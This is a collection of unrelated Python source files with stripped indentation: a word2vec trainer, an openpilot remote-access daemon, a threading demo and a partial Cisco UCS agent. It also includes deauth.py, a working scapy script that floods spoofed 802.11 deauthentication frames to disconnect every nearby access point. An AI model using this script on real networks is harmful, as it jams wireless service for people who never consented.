return flask.redirect(flask.url_for("login"))
if __name__ == "__main__":
socket_io.run(application, debug=literal_eval(config["CORE"]["DEBUG"]),
port=int(config["NET"]["PORT"]), use_reloader=False)
|
word2vec_optimized.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-threaded word2vec unbatched skip-gram model.
Trains the model described in:
(Mikolov et al.) Efficient Estimation of Word Representations in Vector Space
ICLR 2013.
http://arxiv.org/abs/1301.3781
This model does true SGD (i.e. no minibatching). To do this efficiently, custom
ops are used to sequentially process data within a 'batch'.
The key ops used are:
* skipgram custom op that does input processing.
* neg_train custom op that efficiently calculates and applies the gradient using
true SGD.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import threading
import time
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
import tensorflow as tf
from tensorflow.models.embedding import gen_word2vec as word2vec
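# Illustrative sketch (not part of the original file): the skipgram custom op
# streams (center, context) training pairs as described in the module
# docstring; in plain Python, the pairing logic for one token sequence looks
# roughly like this, where `word_ids` is assumed to be a list of vocab ids.
def _skipgram_pairs_sketch(word_ids, window_size):
  """Yield (example, label) id pairs the way a skip-gram scan would."""
  for i, center in enumerate(word_ids):
    lo = max(0, i - window_size)
    hi = min(len(word_ids), i + window_size + 1)
    for j in range(lo, hi):
      if j != i:
        yield (center, word_ids[j])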
flags = tf.app.flags
flags.DEFINE_string("save_path", None, "Directory to write the model.")
flags.DEFINE_string(
"train_data", None,
"Training data. E.g., unzipped file http://mattmahoney.net/dc/text8.zip.")
flags.DEFINE_string(
"eval_data", None, "Analogy questions. "
"See README.md for how to get 'questions-words.txt'.")
flags.DEFINE_integer("embedding_size", 200, "The embedding dimension size.")
flags.DEFINE_integer(
"epochs_to_train", 15,
"Number of epochs to train. Each epoch processes the training data once "
"completely.")
flags.DEFINE_float("learning_rate", 0.025, "Initial learning rate.")
flags.DEFINE_integer("num_neg_samples", 25,
"Negative samples per training example.")
flags.DEFINE_integer("batch_size", 500,
"Numbers of training examples each step processes "
"(no minibatching).")
flags.DEFINE_integer("concurrent_steps", 12,
"The number of concurrent training steps.")
flags.DEFINE_integer("window_size", 5,
"The number of words to predict to the left and right "
"of the target word.")
flags.DEFINE_integer("min_count", 5,
"The minimum number of word occurrences for it to be "
"included in the vocabulary.")
flags.DEFINE_float("subsample", 1e-3,
"Subsample threshold for word occurrence. Words that appear "
"with higher frequency will be randomly down-sampled. Set "
"to 0 to disable.")
flags.DEFINE_boolean(
"interactive", False,
"If true, enters an IPython interactive session to play with the trained "
"model. E.g., try model.analogy(b'france', b'paris', b'russia') and "
"model.nearby([b'proton', b'elephant', b'maxwell'])")
FLAGS = flags.FLAGS
class Options(object):
"""Options used by our word2vec model."""
def __init__(self):
# Model options.
# Embedding dimension.
self.emb_dim = FLAGS.embedding_size
# Training options.
# The training text file.
self.train_data = FLAGS.train_data
# Number of negative samples per example.
self.num_samples = FLAGS.num_neg_samples
# The initial learning rate.
self.learning_rate = FLAGS.learning_rate
# Number of epochs to train. After these many epochs, the learning
# rate decays linearly to zero and the training stops.
self.epochs_to_train = FLAGS.epochs_to_train
# Concurrent training steps.
self.concurrent_steps = FLAGS.concurrent_steps
# Number of examples for one training step.
self.batch_size = FLAGS.batch_size
# The number of words to predict to the left and right of the target word.
self.window_size = FLAGS.window_size
# The minimum number of word occurrences for it to be included in the
# vocabulary.
self.min_count = FLAGS.min_count
# Subsampling threshold for word occurrence.
self.subsample = FLAGS.subsample
# Where to write out summaries.
self.save_path = FLAGS.save_path
if not os.path.exists(self.save_path):
os.makedirs(self.save_path)
# Eval options.
# The text file for eval.
self.eval_data = FLAGS.eval_data
class Word2Vec(object):
"""Word2Vec model (Skipgram)."""
def __init__(self, options, session):
self._options = options
self._session = session
self._word2id = {}
self._id2word = []
self.build_graph()
self.build_eval_graph()
self.save_vocab()
def read_analogies(self):
"""Reads through the analogy question file.
Returns:
questions: a [n, 4] numpy array containing the analogy question's
word ids.
questions_skipped: questions skipped due to unknown words.
"""
questions = []
questions_skipped = 0
with open(self._options.eval_data, "rb") as analogy_f:
for line in analogy_f:
if line.startswith(b":"): # Skip comments.
continue
words = line.strip().lower().split(b" ")
ids = [self._word2id.get(w.strip()) for w in words]
if None in ids or len(ids) != 4:
questions_skipped += 1
else:
questions.append(np.array(ids))
print("Eval analogy file: ", self._options.eval_data)
print("Questions: ", len(questions))
print("Skipped: ", questions_skipped)
self._analogy_questions = np.array(questions, dtype=np.int32)
def build_graph(self):
"""Build the model graph."""
opts = self._options
# The training data. A text file.
(words, counts, words_per_epoch, current_epoch, total_words_processed,
examples, labels) = word2vec.skipgram(filename=opts.train_data,
batch_size=opts.batch_size,
window_size=opts.window_size,
min_count=opts.min_count,
subsample=opts.subsample)
(opts.vocab_words, opts.vocab_counts,
opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch])
opts.vocab_size = len(opts.vocab_words)
print("Data file: ", opts.train_data)
print("Vocab size: ", opts.vocab_size - 1, " + UNK")
print("Words per epoch: ", opts.words_per_epoch)
self._id2word = opts.vocab_words
for i, w in enumerate(self._id2word):
self._word2id[w] = i
# Declare all variables we need.
# Input words embedding: [vocab_size, emb_dim]
w_in = tf.Variable(
tf.random_uniform(
[opts.vocab_size,
opts.emb_dim], -0.5 / opts.emb_dim, 0.5 / opts.emb_dim),
name="w_in")
# Global step: scalar, i.e., shape [].
w_out = tf.Variable(tf.zeros([opts.vocab_size, opts.emb_dim]), name="w_out")
# Global step: []
global_step = tf.Variable(0, name="global_step")
# Linear learning rate decay.
words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
lr = opts.learning_rate * tf.maximum(
0.0001,
1.0 - tf.cast(total_words_processed, tf.float32) / words_to_train)
# Training nodes.
inc = global_step.assign_add(1)
with tf.control_dependencies([inc]):
train = word2vec.neg_train(w_in,
w_out,
examples,
labels,
lr,
vocab_count=opts.vocab_counts.tolist(),
num_negative_samples=opts.num_samples)
self._w_in = w_in
self._examples = examples
self._labels = labels
self._lr = lr
self._train = train
self.global_step = global_step
self._epoch = current_epoch
self._words = total_words_processed
def save_vocab(self):
"""Save the vocabulary to a file so the model can be reloaded."""
opts = self._options
with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f:
for i in xrange(opts.vocab_size):
vocab_word = tf.compat.as_text(opts.vocab_words[i]).encode("utf-8")
f.write("%s %d\n" % (vocab_word,
opts.vocab_counts[i]))
def build_eval_graph(self):
"""Build the evaluation graph."""
# Eval graph
opts = self._options
# Each analogy task is to predict the 4th word (d) given three
# words: a, b, c. E.g., a=italy, b=rome, c=france, we should
# predict d=paris.
# The eval feeds three vectors of word ids for a, b, c, each of
# which is of size N, where N is the number of analogies we want to
# evaluate in one batch.
analogy_a = tf.placeholder(dtype=tf.int32) # [N]
analogy_b = tf.placeholder(dtype=tf.int32) # [N]
analogy_c = tf.placeholder(dtype=tf.int32) # [N]
# Normalized word embeddings of shape [vocab_size, emb_dim].
nemb = tf.nn.l2_normalize(self._w_in, 1)
# Each row of a_emb, b_emb, c_emb is a word's embedding vector.
# They all have the shape [N, emb_dim]
a_emb = tf.gather(nemb, analogy_a) # a's embs
b_emb = tf.gather(nemb, analogy_b) # b's embs
c_emb = tf.gather(nemb, analogy_c) # c's embs
# We expect that d's embedding vectors on the unit hyper-sphere is
# near: c_emb + (b_emb - a_emb), which has the shape [N, emb_dim].
target = c_emb + (b_emb - a_emb)
# Compute cosine distance between each pair of target and vocab.
# dist has shape [N, vocab_size].
dist = tf.matmul(target, nemb, transpose_b=True)
# For each question (row in dist), find the top 4 words.
_, pred_idx = tf.nn.top_k(dist, 4)
# Nodes for computing neighbors for a given word according to
# their cosine distance.
nearby_word = tf.placeholder(dtype=tf.int32) # word id
nearby_emb = tf.gather(nemb, nearby_word)
nearby_dist = tf.matmul(nearby_emb, nemb, transpose_b=True)
nearby_val, nearby_idx = tf.nn.top_k(nearby_dist,
min(1000, opts.vocab_size))
# Nodes in the construct graph which are used by training and
# evaluation to run/feed/fetch.
self._analogy_a = analogy_a
self._analogy_b = analogy_b
self._analogy_c = analogy_c
self._analogy_pred_idx = pred_idx
self._nearby_word = nearby_word
self._nearby_val = nearby_val
self._nearby_idx = nearby_idx
# Properly initialize all variables.
tf.global_variables_initializer().run()
self.saver = tf.train.Saver()
def _train_thread_body(self):
initial_epoch, = self._session.run([self._epoch])
while True:
_, epoch = self._session.run([self._train, self._epoch])
if epoch != initial_epoch:
break
def train(self):
"""Train the model."""
opts = self._options
initial_epoch, initial_words = self._session.run([self._epoch, self._words])
workers = []
for _ in xrange(opts.concurrent_steps):
t = threading.Thread(target=self._train_thread_body)
t.start()
workers.append(t)
last_words, last_time = initial_words, time.time()
while True:
time.sleep(5) # Reports our progress once a while.
(epoch, step, words, lr) = self._session.run(
[self._epoch, self.global_step, self._words, self._lr])
now = time.time()
last_words, last_time, rate = words, now, (words - last_words) / (
now - last_time)
print("Epoch %4d Step %8d: lr = %5.3f words/sec = %8.0f\r" % (epoch, step,
lr, rate),
end="")
sys.stdout.flush()
if epoch != initial_epoch:
break
for t in workers:
t.join()
def _predict(self, analogy):
"""Predict the top 4 answers for analogy questions."""
idx, = self._session.run([self._analogy_pred_idx], {
self._analogy_a: analogy[:, 0],
self._analogy_b: analogy[:, 1],
self._analogy_c: analogy[:, 2]
})
return idx
def eval(self):
"""Evaluate analogy questions and reports accuracy."""
# How many questions we get right at precision@1.
correct = 0
try:
total = self._analogy_questions.shape[0]
except AttributeError:
    raise AttributeError("Need to read analogy questions.")
start = 0
while start < total:
limit = start + 2500
sub = self._analogy_questions[start:limit, :]
idx = self._predict(sub)
start = limit
for question in xrange(sub.shape[0]):
for j in xrange(4):
if idx[question, j] == sub[question, 3]:
# Bingo! We predicted correctly. E.g., [italy, rome, france, paris].
correct += 1
break
elif idx[question, j] in sub[question, :3]:
# We need to skip words already in the question.
continue
else:
# The correct label is not the precision@1
break
print()
print("Eval %4d/%d accuracy = %4.1f%%" % (correct, total,
correct * 100.0 / total))
def analogy(self, w0, w1, w2):
"""Predict word w3 as in w0:w1 vs w2:w3."""
wid = np.array([[self._word2id.get(w, 0) for w in [w0, w1, w2]]])
idx = self._predict(wid)
for c in [self._id2word[i] for i in idx[0, :]]:
  if c not in [w0, w1, w2]:
    print(c)
    return
print("unknown")
def nearby(self, words, num=20):
"""Prints out nearby words given a list of words."""
ids = np.array([self._word2id.get(x, 0) for x in words])
vals, idx = self._session.run(
[self._nearby_val, self._nearby_idx], {self._nearby_word: ids})
for i in xrange(len(words)):
print("\n%s\n=====================================" % (words[i]))
for (neighbor, distance) in zip(idx[i, :num], vals[i, :num]):
print("%-20s %6.4f" % (self._id2word[neighbor], distance))
def _start_shell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
def main(_):
"""Train a word2vec model."""
if not FLAGS.train_data or not FLAGS.eval_data or not FLAGS.save_path:
print("--train_data --eval_data and --save_path must be specified.")
sys.exit(1)
opts = Options()
with tf.Graph().as_default(), tf.Session() as session:
with tf.device("/cpu:0"):
model = Word2Vec(opts, session)
model.read_analogies() # Read analogy questions
for _ in xrange(opts.epochs_to_train):
model.train() # Process one epoch
model.eval() # Eval analogies.
# Perform a final save.
model.saver.save(session, os.path.join(opts.save_path, "model.ckpt"),
global_step=model.global_step)
if FLAGS.interactive:
# E.g.,
# [0]: model.analogy(b'france', b'paris', b'russia')
# [1]: model.nearby([b'proton', b'elephant', b'maxwell'])
_start_shell(locals())
if __name__ == "__main__":
tf.app.run()
|
athenad.py
|
#!/usr/bin/env python3
import base64
import hashlib
import io
import json
import os
import sys
import queue
import random
import select
import socket
import threading
import time
from collections import namedtuple
from functools import partial
from typing import Any
import requests
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import ABNF, WebSocketTimeoutException, WebSocketException, create_connection
import cereal.messaging as messaging
from cereal.services import service_list
from common.api import Api
from common.basedir import PERSIST
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE, PC, TICI, JETSON
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.swaglog import cloudlog, SWAGLOG_DIR
from selfdrive.version import get_version, get_git_remote, get_git_branch, get_git_commit
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://athena.comma.ai')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = set([8022])
LOG_ATTR_NAME = 'user.upload'
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
RECONNECT_TIMEOUT_S = 70
dispatcher["echo"] = lambda s: s
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
log_send_queue: Any = queue.Queue()
log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id'])
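# Illustrative JSON-RPC exchange handled via the dispatcher (example values,
# not captured traffic):
#   -> {"method": "echo", "params": ["hello"], "jsonrpc": "2.0", "id": 0}
#   <- {"result": "hello", "jsonrpc": "2.0", "id": 0}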
def handle_long_poll(ws):
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event), name='ws_recv'),
threading.Thread(target=ws_send, args=(ws, end_event), name='ws_send'),
threading.Thread(target=upload_handler, args=(end_event,), name='upload_handler'),
threading.Thread(target=log_handler, args=(end_event,), name='log_handler'),
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,), name=f'worker_{x}')
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for thread in threads:
cloudlog.debug(f"athena.joining {thread.name}")
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = recv_queue.get(timeout=1)
if "method" in data:
cloudlog.debug(f"athena.jsonrpc_handler.call_method {data}")
response = JSONRPCResponseManager.handle(data, dispatcher)
send_queue.put_nowait(response.json)
elif "id" in data and ("result" in data or "error" in data):
log_recv_queue.put_nowait(data)
else:
raise Exception("not a valid request or response")
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
send_queue.put_nowait(json.dumps({"error": str(e)}))
def upload_handler(end_event):
while not end_event.is_set():
try:
item = upload_queue.get(timeout=1)
if item.id in cancelled_uploads:
cancelled_uploads.remove(item.id)
continue
_do_upload(item)
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item):
with open(upload_item.path, "rb") as f:
size = os.fstat(f.fileno()).st_size
return requests.put(upload_item.url,
data=f,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=10)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def getVersion():
return {
"version": get_version(),
"remote": get_git_remote(),
"branch": get_git_branch(),
"commit": get_git_commit(),
}
@dispatcher.add_method
def setNavDestination(latitude=0, longitude=0):
destination = {
"latitude": latitude,
"longitude": longitude,
}
Params().put("NavDestination", json.dumps(destination))
return {"success": 1}
@dispatcher.add_method
def listDataDirectory():
files = [os.path.relpath(os.path.join(dp, f), ROOT) for dp, dn, fn in os.walk(ROOT) for f in fn]
return files
@dispatcher.add_method
def reboot():
sock = messaging.sub_sock("deviceState", timeout=1000)
ret = messaging.recv_one(sock)
if ret is None or ret.deviceState.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
HARDWARE.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
if len(fn) == 0 or fn[0] == '/' or '..' in fn:
return 500
path = os.path.join(ROOT, fn)
if not os.path.exists(path):
return 404
item = UploadItem(path=path, url=url, headers=headers, created_at=int(time.time() * 1000), id=None)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
return {"enqueued": 1, "item": item._asdict()}
@dispatcher.add_method
def listUploadQueue():
return [item._asdict() for item in list(upload_queue.queue)]
@dispatcher.add_method
def cancelUpload(upload_id):
upload_ids = set(item.id for item in list(upload_queue.queue))
if upload_id not in upload_ids:
return 404
cancelled_uploads.add(upload_id)
return {"success": 1}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
cloudlog.debug("athena.startLocalProxy.starting")
params = Params()
dongle_id = params.get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(0)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
cloudlog.debug("athena.startLocalProxy.started")
return {"success": 1}
except Exception as e:
cloudlog.exception("athenad.startLocalProxy.exception")
raise e
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile(PERSIST + '/comma/id_rsa.pub'):
return None
with open(PERSIST + '/comma/id_rsa.pub', 'r') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
return HARDWARE.get_network_type()
@dispatcher.add_method
def takeSnapshot():
from selfdrive.camerad.snapshot.snapshot import snapshot, jpeg_write
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def get_logs_to_send_sorted():
# TODO: scan once then use inotify to detect file creation/deletion
curr_time = int(time.time())
logs = []
for log_entry in os.listdir(SWAGLOG_DIR):
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
time_sent = int.from_bytes(getxattr(log_path, LOG_ATTR_NAME), sys.byteorder)
except (ValueError, TypeError):
time_sent = 0
# assume send failed and we lost the response if sent more than one hour ago
if not time_sent or curr_time - time_sent > 3600:
logs.append(log_entry)
# return logs in order they should be sent
# excluding most recent (active) log file
return sorted(logs)[:-1]
def log_handler(end_event):
if PC or JETSON:
return
log_files = []
last_scan = 0
while not end_event.is_set():
try:
curr_scan = sec_since_boot()
if curr_scan - last_scan > 10:
log_files = get_logs_to_send_sorted()
last_scan = curr_scan
# send one log
curr_log = None
if len(log_files) > 0:
log_entry = log_files.pop()
cloudlog.debug(f"athena.log_handler.forward_request {log_entry}")
try:
curr_time = int(time.time())
log_path = os.path.join(SWAGLOG_DIR, log_entry)
setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
with open(log_path, "r") as f:
jsonrpc = {
"method": "forwardLogs",
"params": {
"logs": f.read()
},
"jsonrpc": "2.0",
"id": log_entry
}
log_send_queue.put_nowait(json.dumps(jsonrpc))
curr_log = log_entry
except OSError:
pass # file could be deleted by log rotation
# wait for response up to ~100 seconds
# always read queue at least once to process any old responses that arrive
for _ in range(100):
if end_event.is_set():
break
try:
log_resp = json.loads(log_recv_queue.get(timeout=1))
log_entry = log_resp.get("id")
log_success = "result" in log_resp and log_resp["result"].get("success")
cloudlog.debug(f"athena.log_handler.forward_response {log_entry} {log_success}")
if log_entry and log_success:
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
except OSError:
pass # file could be deleted by log rotation
if curr_log == log_entry:
break
except queue.Empty:
if curr_log is None:
break
except Exception:
cloudlog.exception("athena.log_handler.exception")
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
cloudlog.debug("athena.ws_proxy_recv closing sockets")
ssock.close()
local_sock.close()
cloudlog.debug("athena.ws_proxy_recv done closing sockets")
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
cloudlog.debug("athena.ws_proxy_send closing sockets")
signal_sock.close()
cloudlog.debug("athena.ws_proxy_send done closing sockets")
def ws_recv(ws, end_event):
last_ping = int(sec_since_boot() * 1e9)
while not end_event.is_set():
try:
opcode, data = ws.recv_data(control_frame=True)
if opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
if opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
recv_queue.put_nowait(data)
elif opcode == ABNF.OPCODE_PING:
last_ping = int(sec_since_boot() * 1e9)
Params().put("LastAthenaPingTime", str(last_ping))
except WebSocketTimeoutException:
ns_since_last_ping = int(sec_since_boot() * 1e9) - last_ping
if ns_since_last_ping > RECONNECT_TIMEOUT_S * 1e9:
cloudlog.exception("athenad.wc_recv.timeout")
end_event.set()
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
try:
data = send_queue.get_nowait()
except queue.Empty:
data = log_send_queue.get(timeout=1)
ws.send(data)
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
def backoff(retries):
return random.randrange(0, min(128, int(2 ** retries)))
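# e.g. retries of 0, 1, 2, ..., 7+ draw from [0, 1), [0, 2), [0, 4), ..., [0, 128):
# randomized exponential backoff keeps mass reconnects from synchronizing.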
def manage_tokens(api):
if not TICI:
return
try:
params = Params()
mapbox = api.get(f"/v1/tokens/mapbox/{api.dongle_id}/", timeout=5.0, access_token=api.get_token())
if mapbox.status_code == 200:
params.put("MapboxToken", mapbox.json()["token"])
else:
params.delete("MapboxToken")
except Exception:
cloudlog.exception("Failed to update tokens")
def main():
params = Params()
dongle_id = params.get("DongleId", encoding='utf-8')
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri)
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True,
timeout=1.0)
ws.settimeout(1)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
manage_tokens(api)
conn_retries = 0
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
break
except (ConnectionError, TimeoutError, WebSocketException):
conn_retries += 1
params.delete("LastAthenaPingTime")
except Exception:
cloudlog.exception("athenad.main.exception")
conn_retries += 1
params.delete("LastAthenaPingTime")
time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
deauth.py
|
import logging
import sys
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import socket
import _thread
from subprocess import call
from threading import Thread
from time import sleep
import printings
# local imports
from scan import WifiScan
conf.verb = 0
RED = "\033[1;31m"
GREEN = "\033[1;32m"
YELLOW = "\033[1;93m"
T_YELLOW = "\033[0;93m"
NORMAL = "\033[0;0m"
class Deauth(object):
def __init__(self, APs, interface):
self.APs = APs
self.interface = interface
self.BROADCAST = "FF:FF:FF:FF:FF:FF"
self.burst = 32
def start_deauth(self):
conf.iface = self.interface
if 3 <= len(self.APs) < 5:
self.burst = 10
if len(self.APs) >= 7:
self.burst = 3
while True:
for bssid in self.APs:
packet = Dot11(addr1=self.BROADCAST, addr2=bssid, addr3=bssid) / Dot11Deauth()
channel = self.APs[bssid]
call("sudo iwconfig {iface} channel {ch}".format(iface=self.interface, ch=channel), shell=True)
try:
send(packet, count=self.burst)
except socket.error:
print("{R}ERROR: Network-Interface is down.{N}".format(R=RED, N=NORMAL))
sys.exit(0)
print("[{G}+{N}] {pkt} frames sent to {Y}{bssid}{N}".format(pkt=self.burst, G=GREEN, N=NORMAL, Y=YELLOW, bssid=bssid.upper()))
sleep(1)
class DeauthAll(object):
def __init__(self, interface):
self.interface = interface
self.burst = 32
self.BROADCAST = "FF:FF:FF:FF:FF:FF"
self.deauth_active = False
def start_deauth_all(self):
def scan():
call("sudo clear", shell=True)
print("[{Y}*{N}] Scanning for new Access-Points... (8 sec.)".format(Y=YELLOW, N=NORMAL))
self.deauth_active = False
wifiscan.channelhop_active = True
wifiscan.do_scan()
wifiscan.channelhop_active = False
self.APs = wifiscan.get_access_points()
if len(self.APs) < 1:
print("\n{R}No Access-Points found. :({N}\n".format(R=RED, N=NORMAL))
_thread.interrupt_main()
printings.deauth_all()
for bssid in self.APs:
print(" {G}->{N} {bssid} | {Y}{essid}{N}".format(G=GREEN, Y=T_YELLOW, N=NORMAL, bssid=bssid, essid=self.APs[bssid]["essid"]))
self.deauth_active = True
sleep(120)
scan()
conf.iface = self.interface
wifiscan = WifiScan(self.interface)
wifiscan.do_output = False
wifiscan.timeout = 8
hopT = Thread(target=wifiscan.channelhop, args=[])
hopT.daemon = True
hopT.start()
scanT = Thread(target=scan, args=[])
scanT.daemon = True
scanT.start()
while True:
if self.deauth_active:
if 1 < len(self.APs) < 5:
self.burst = 10
elif 5 < len(self.APs):
self.burst = 3
for bssid in self.APs:
packet = Dot11(addr1=self.BROADCAST, addr2=bssid, addr3=bssid) / Dot11Deauth()
send(packet, count=self.burst)
sleep(1)
|
tasks1.py
|
import time
import threading
def countdown(count):
while count >= 0:
print("'{0}' count down -> {1}".format(threading.current_thread().name, count))
count -= 1
time.sleep(3)
def countup():
count = 0
while count <= 10:
print("'{0}' count up -> {1}".format(threading.current_thread().name, count))
count += 1
time.sleep(5)
print(threading.__file__)
th1 = threading.Thread(target=countdown, args=(10,), name='thread1')
th2 = threading.Thread(target=countup, args=(), name='thread2')
th1.start()
th2.start()
#countdown(10)
print("All done!")
|
ucs_agent.py
|
# -*- coding: utf-8 -*-
# Copyright 2017 Cisco Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import pycurl
import re
import threading
from time import sleep
import argparse
import xmltodict
from ucsmsdk import ucsgenutils
from ucsmsdk import ucsmethodfactory
from ucsmsdk.ucshandle import UcsHandle
from ucsmsdk.ucsmethod import ExternalMethod
from ucsmsdk.ucsmo import ManagedObject
from zeus import client
import config as conf
class UCSAgent(object):
def __init__(self):
super(UCSAgent, self).__init__()
self.url = ''
self.user = ''
self.passwd = ''
self.cookie = ''
self.zeus_client = None
self.zeus_server = ''
self.token = ''
self.listener = None
self.event_string = ''
self.class_ids = []
self.fault = ["faultInst"]
self.performance = ["swSystemStats",
"etherTxStats",
"etherPauseStats",
"etherRxStats",
"etherErrStats",
"adaptorVnicStats",
"equipmentPsuStats",
"processorEnvStats",
"computeMbTempStats",
"computeMbPowerStats",
"equipmentChassisStats"]
self.inventory = ["firmwareRunning",
"storageLocalDisk",
"vnicEtherIf",
"lsServer",
"fabricVsan",
"fabricVlan",
"fabricEthLanPcEp",
"fabricEthLanPc",
"etherPIo",
"fabricDceSwSrvEp",
"computeBlade",
"equipmentPsu",
"equipmentChassis",
"equipmentSwitchCard",
"equipmentIOCard",
"topSystem",
"computeRackUnit"]
self.class_ids.extend(self.fault)
self.class_ids.extend(self.performance)
self.class_ids.extend(self.inventory)
self.count = 0
self.len = 0
def get_args(self):
# read arguments from command line parameters
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--ucs", nargs="?", type=str, default=conf.UCS,
help="""IP or host name of unified computing system managed server.
\n(default: %s)""" % conf.UCS)
parser.add_argument("-C", "--Count", nargs="?", type=str,
default=conf.COUNT,
help="Count of records in one log list. \n(default: %s)" % conf.COUNT)
parser.add_argument("-u", "--user", nargs="?", type=str,
default=conf.UCS_USER,
help="User name of UCS. \n(default: %s)" % conf.UCS_USER)
parser.add_argument("-p", "--password", nargs="?", type=str,
default=conf.UCS_PASSWD,
